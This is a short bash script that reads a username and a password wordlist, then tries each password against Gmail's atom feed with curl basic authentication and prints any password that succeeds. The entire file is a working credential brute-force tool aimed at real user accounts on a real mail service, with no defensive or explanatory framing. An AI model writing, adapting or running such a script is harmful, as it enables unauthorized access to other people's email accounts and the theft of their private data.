#!/bin/bash
readarray -t pword < <(cat $2);
uname=$1

for file in "${pword[@]}" ; do

CURL=$(curl --silent --fail --user $uname:$file "https://mail.google.com/mail/feed/atom"); 

 if [[ ! "${CURL}" ]] ; then 
 echo "Failed login."; 
	else echo "${CURL}" | sed '/^.*$/d'; 
	     echo -e "\nPASSWORD WAS: $file" 
 fi

done
